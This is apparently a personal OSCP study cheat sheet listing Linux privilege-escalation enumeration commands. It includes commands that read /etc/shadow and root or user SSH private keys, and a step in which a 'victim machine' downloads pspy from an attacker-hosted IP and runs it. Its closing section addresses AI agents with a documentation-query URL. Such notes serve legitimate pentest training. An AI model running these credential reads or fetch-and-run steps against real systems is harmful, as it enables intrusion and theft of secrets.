# Linux
## Online Resource
{% embed url="" %}
{% embed url="" %}
## Points of Interest
### Sudo Things
{% code overflow="wrap" fullWidth="true" %}
```
sudo -l
sudo -V | grep -i "sudo ver"
```
{% endcode %}
### System Information
{% code overflow="wrap" fullWidth="true" %}
```
Basic system information: uname -a
CPU information: lscpu
Disk information: lsblk
USB information: lsusb
Kernel Version: cat /etc/issue
Network: ss -nltp
```
{% endcode %}
### User Roles
{% code overflow="wrap" fullWidth="true" %}
```
id
groups
```
{% endcode %}
### Crontab
{% code overflow="wrap" fullWidth="true" %}
```
crontab -l
cat /etc/crontab
ls -lah /etc/cron.*
grep -i "CRON" /var/log/syslog
```
{% endcode %}
### Special Bits
{% code overflow="wrap" fullWidth="true" %}
```
find / -perm -u=s -type f 2>/dev/null
getcap -r / 2>/dev/null
/usr/sbin/getcap -r / 2>/dev/null
```
{% endcode %}
### Interesting Files
cat /etc/passwd
cat /etc/shadow
cat /etc/hosts
ls -la /var/www
ls -la /opt
cat /root/.ssh/authorized_keys
cat /root/.ssh/id_rsa
cat /home/<user>/.ssh/id_rsa
cat /home/<user>/.ssh/id_ecdsa
cat /home/<user>/.ssh/authorized_keys
find / -name config.php -type f 2>/dev/null
find / -name doas.conf -type f 2>/dev/null
find / -name apache* -type d 2>/dev/null
find / -name *.txt -type f 2>/dev/null
find / -name *.sh -type f 2>/dev/null
find / -name .ht* -type f 2>/dev/null
find / -name id_rsa -type f 2>/dev/null
find / -name id_ecdsa -type f 2>/dev/null
find / -name authorized_keys -type f 2>/dev/null
find /home/ -name local.txt -type f 2>/dev/null
find /root/ -name proof.txt -type f 2>/dev/null
find / -name local.txt -type f 2>/dev/null
find / -name proof.txt -type f 2>/dev/null
### Writable Directories
{% code overflow="wrap" fullWidth="true" %}
```
find / -writable -type d 2>/dev/null
```
{% endcode %}
### Catch Repeating Processes
{% code overflow="wrap" fullWidth="true" %}
```
watch -n 1 "ps aux"
watch -n 1 "ps aux | grep -i "
while sleep 1; do ps aux; done
while sleep 1; do ps aux | grep -i ; done
```
{% endcode %}
### Monitoring Processes with PsPy
{% code overflow="wrap" fullWidth="true" %}
```
On Kali Machine:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64
python3 -m http.server 80
On Victim Machine:
wget https://192.168.45.200/pspy64 && chmod +x pspy64
./pspy64
```
{% endcode %}
### Reading Binaries
strings <file>
### Finding Kernel Exploits
{% code overflow="wrap" fullWidth="true" %}
```docker
SearchSploit:
searchploit
searchsploit -m
For Kernal Vulnerabilities:
searchsploit "linux kernel Local Privilege Escalation" | grep ""
= cat /etc/issue
= uname -r
Example: searchsploit "linux kernel Ubuntu 16 Local Privilege Escalation" | grep "4." | grep -v "< 4.4.0" | grep -v “4.8”
```
{% endcode %}
## Automated Enumeration
### LinPeas
{% code overflow="wrap" fullWidth="true" %}
```
On the Attacker:
/usr/share/peass/linpeas/linpeas.sh
/usr/share/peass/linpeas/linpeas_small.sh
wget https://github.com/peass-ng/PEASS-ng/releases/download/20250106-5a706ae2/linpeas.sh
Transfer the respective executable onto compromised system
Run the executable and enumerate the output
```
{% endcode %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://personal-archive.gitbook.io/oscp-exam-prep/enumeration/linux.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.